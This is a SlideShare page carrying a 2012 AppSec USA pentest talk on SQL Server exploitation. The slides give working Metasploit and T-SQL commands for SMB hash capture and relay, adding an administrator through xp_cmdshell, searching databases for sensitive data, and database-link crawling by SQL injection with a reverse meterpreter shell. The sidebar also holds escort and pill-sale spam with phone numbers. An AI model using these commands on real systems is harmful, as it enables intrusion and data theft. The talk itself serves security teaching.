Architecting cloud
 
TrinityCore server install guide
TrinityCore server install guideTrinityCore server install guide
TrinityCore server install guide
 
Mysql ppt
Mysql pptMysql ppt
Mysql ppt
 
Mysql all
Mysql allMysql all
Mysql all
 
Mysql all
Mysql allMysql all
Mysql all
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on Windows
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Security features In MySQL 8.0
Security features In MySQL 8.0Security features In MySQL 8.0
Security features In MySQL 8.0
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
Whitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxWhitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on Linux
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
 
MySQL database replication
MySQL database replicationMySQL database replication
MySQL database replication
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp Boston
 
MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017
 
Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)
 
Aeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringAeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filtering
 

Mehr von Scott Sutherland

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Scott Sutherland
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)Scott Sutherland
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShellScott Sutherland
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Scott Sutherland
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360Scott Sutherland
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksScott Sutherland
 

Mehr von Scott Sutherland (15)

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 

Kürzlich hochgeladen

DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 

Kürzlich hochgeladen (20)

DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

  • 1. SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
  • 2. Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
  • 3. What are we going to cover? 1. Database entry points 2. Domain user  Database user 3. Database user  OS admin 4. OS admin  Database admin 5. Database admin  OS admin 6. Finding sensitive data 7. Escalation: Service accounts 8. Escalation: Database Link Crawling 9. Conclusions
  • 4. Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
  • 5. Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
  • 7. Entry Points: Summary asef Unauthenticated Options • SQL injections • Weak passwords Authenticated Options (usually) • Other database servers • Unencrypted connection strings: ‒ Files ‒ Registry ‒ Network • ODBC connections • Client tools (priv inheritance)
  • 8. DOMAIN user  DATABASE user Privilege Inheritance
  • 9. Privilege Inheritance: Summary The “Domains Users” group is often provided privileges to login into SQL Servers… Evil users just need to: • Find SQL Servers • Verify Access • Attack!
  • 10. Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
  • 11. Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
  • 12. Privilege Inheritance: Verify Access Test current user’s access to SQL Servers with osql: FOR /F “tokens=*” %i in (‘type sqlservers.txt’) do osql –E –S %i –Q “select ‘I have access to:’+@@servername”
  • 13. Privilege Inheritance: Verify Access Test alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module: msfconsole use auxiliary/admin/mssql/mssql_sql set RHOST <IP RANGE> set RPORT <port> set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> Set SQL <query> run http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
  • 16. DATABASE USER  OS ADMIN SMB Capture/Relay
  • 17. SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
  • 18. SMB Capture/Relay: Summary Stored procedures with UNC support: ‒ *xp_dirtree ‒ *xp_fileexist ‒ xp_getfiledetails Possible SMB authentication attacks: Service Account Network Communication SMB Capture SMB Relay LocalSystem Computer Account Yes No NetworkService Computer Account Yes No *Local Administrator Local Administrator Yes Yes *Domain User Domain User Yes Yes *Domain Admin Domain Admin Yes Yes http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/ http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
  • 20. SMB Capture: Start Sniffing for Hashes Start Metasploit SMB capture module on your evil server to capture seeded password hashes: msfconsole use auxiliary/server/capture/smb set CAINPWFILE /root/cain_hashes.txt set JOHNPWFILE /root/john_hashes.txt exploit http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 21. SMB Capture: Force MS SQL to Auth Force SQL Server to authenticate with the modules: MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
  • 22. SMB Capture: Obtain Seeded Hashes Obtaining service account hashes from the SQL Server should look something like this: DOMAIN: DEMO USER: serviceaccount LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25 NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 23. SMB Capture: Crack Hashes 1. Crack first half of recovered LANMAN hash with seeded half LM Rainbow Tables: rcracki_mt -h 5e17a06b538a42ae ./halflmchall 2. Crack the second half with john the ripper to obtain case sensitive NTLM password. perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 24. SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
  • 25. SMB Relay: Setup SMBProxy for Relay SMB Relay to 3rd Party with the SMB_Relay Metasploit exploit module: msfconsole use exploit/windows/smb/smb_relay set SMBHOST <targetserver> exploit If the service account has the local admin privileges on the remote system, then a shell will be returned by the smb_relay module http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
  • 26. SMB Relay: Force MS SQL to Auth Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI Msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
  • 27. SMB Relay: Get Meterpreter Shells
  • 28. SMB Capture/Relay: Using PW or Shell If meterpreter then: • Type: shell • Type: osql –E –Q “what ever you want” If password: • Sign in via RDP • Open a cmd console • osql –E –Q “what ever you want”
  • 29. DEMO
  • 30. Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
  • 31. OS ADMIN  DATABASE ADMIN SQL Server Local Authorization Bypass
  • 32. Local Auth Bypass: Summary How can we go from OS admin to DB admin? • SQL Server 2000 to 2008 ‒ LocalSystem = Sysadmin privileges • SQL Server 2012 ‒ Must migrate to SQL Server service process for Sysadmin privileges
  • 33. Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
  • 34. Local Auth Bypass: Psexec On SQL Server 2000 to 2008 Execute queries as sysadmin with osql: psexec –s cmd.exe osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)” Execute queries as sysadmin with SSMS: psexec –i –s ssms http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
  • 35. Local Auth Bypass: Get Shell Obtain Meterpreter shell using the PSEXEC module msfconsole use exploit/windows/smb/psexec set RHOST <targetserver> set SMBDOMAIN . set SMBUSER <user> set SMBPASS <password> exploit http://www.metasploit.com/modules/exploit/windows/smb/psexec
  • 36. Local Auth Bypass: Get Sysadmin Create sysadmin in database using the Metasploit mssql_local_auth_bypass post module: In Meterpeter type “background” to return to msconsole. Then, in the msfconsole type: use post/windows/manage/mssql_local_auth_bypass set session <session> set DB_USERNAME <username> set DB_PASSWORD <password> exploit http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
  • 37. SQL Server Auth Bypass: Got Sysadmin asef
  • 38. Do a crazy whale dance! To the left… To the right… Now dive!
  • 39. DATABASE ADMIN  OS ADMIN xp_cmdshell
  • 40. XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
  • 41. XP_CMDSHELL: Re-Install Re-install xp_cmdshell EXEC master..sp_addextendedproc "xp_cmdshell", "C:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll";
  • 42. XP_CMDSHELL: Re-Enable Re-enable xp_cmdshell sp_configure ‘show advanced options’, 1; reconfigure; go; sp_configure ‘xp_cmdshell’, 1; reconfigure; go;
  • 43. XP_CMDSHELL: Execute Commands Add Local OS Administrator with xp_cmdshell EXEC master..xp_cmdshell ‘net user myadmin MyP@sword1’ EXEC master..xp_cmdshell ‘net localgroup administrators /add myadmin’
  • 45. Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
  • 46. Finding Data: TSQL Script Simple keywords search via TSQL! EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name,''[?]'' as Database_name,Table_Name,Column_Name FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%'' OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%'' ORDER BY Table_name'
  • 47. Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
  • 48. Finding Data: Metasploit Module Launching mssql_findandsampledata: msfconsole use auxiliary/admin/mssql/mssql_findandsampledata set RHOSTS <range> set RPORT <port> setg USE_WINDOWS_AUTHENT true setg DOMAIN <CompanyDomain> set USERNAME <username> set PASSWORD <password> set SAMPLE_SIZE <size> set KEYWORDS credit|social|password exploit
  • 49. Finding Data: Module Output asef
  • 51. Do a crazy cat disco dance!
  • 53. Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
  • 54. Shared Service Accounts: Diagram asef
  • 55. Shared Service Accounts: TSQL Script XP_CMDSHELL + OSQL = MORE ACCESS! EXEC master..xp_cmdshell ‘osql –E –S HVA –Q “select super.secret.data”’ More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking- with-the-osql-utility/
  • 57. Database Link Crawling: Summary Database Links • Allow one database server to query another • Often configured with excessive privileges • Can be chained together • Use openquery() to query linked servers • Can be used to execute the infamous xp_cmdshell • Tons of access, no credentials required (via SQL injection)
  • 58. Database Link Crawling: Diagram asef
  • 59. Database Link Crawling: List Links How do I list linked servers? Two common options: sp_linkedservers and SELECT srvname FROM master..sysservers
  • 60. Database Link Crawling: List Links How do I list linked servers on a linked server? SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
  • 61. Database Link Crawling: List Links How do I list linked servers on the linked server’s linked server? SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
  • 62. Database Link Crawling: You Get it! ….You get the point You can follow links until you run out 
  • 63. Database Link Crawling: Exec Cmds How do I run commands on a linked server? SELECT * FROM openquery(DB1,’SELECT * FROM openquery(HVA,’’SELECT 1;exec xp_cmdshell ‘’’’ping 192.168.1.1’’’’ ‘’)’)
  • 64. Database Link Crawling: Modules Two Modules 1. Direct connection 2. SQL Injection Available for Download • Not submitted to Metasploit trunk – Yet • Downloads available from nullbind’s github ‒ mssql_linkcrawler.rb ‒ mssql_linkcrawler_sqli.rb
  • 65. Database Link Crawling: Modules • Features ‒ Crawl SQL Server database links ‒ Standard Crawl output ‒ Verbose Crawl output ‒ Output to CSV file ‒ Supports 32 and 64 bit Windows ‒ Global Metasploit payload deployment ‒ Targeted Metasploit payload deployment ‒ Payload deployment via powershell memory injection
  • 66. Metasploit Module: Run multi/handler Setup the multi/handler module: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j -z
  • 67. Metasploit Module: Link Crawler Setup the mssql_linkcrawler_sqli module: use exploit/windows/mssql/mssql_linkcrawler_sqli set GET_PATH /employee.asp?id=1;[SQLi];-- set type blind set RHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.130 set lport 443 set DisablePayloadHandler true exploit
  • 68. Database Link Crawling: Attack! asef
  • 70. Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
  • 71. Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
  • 72. Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
  • 73. Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
  • 74. Conclusions Configure SMB SIGNING
  • 75. Conclusions don’t do DRUGS
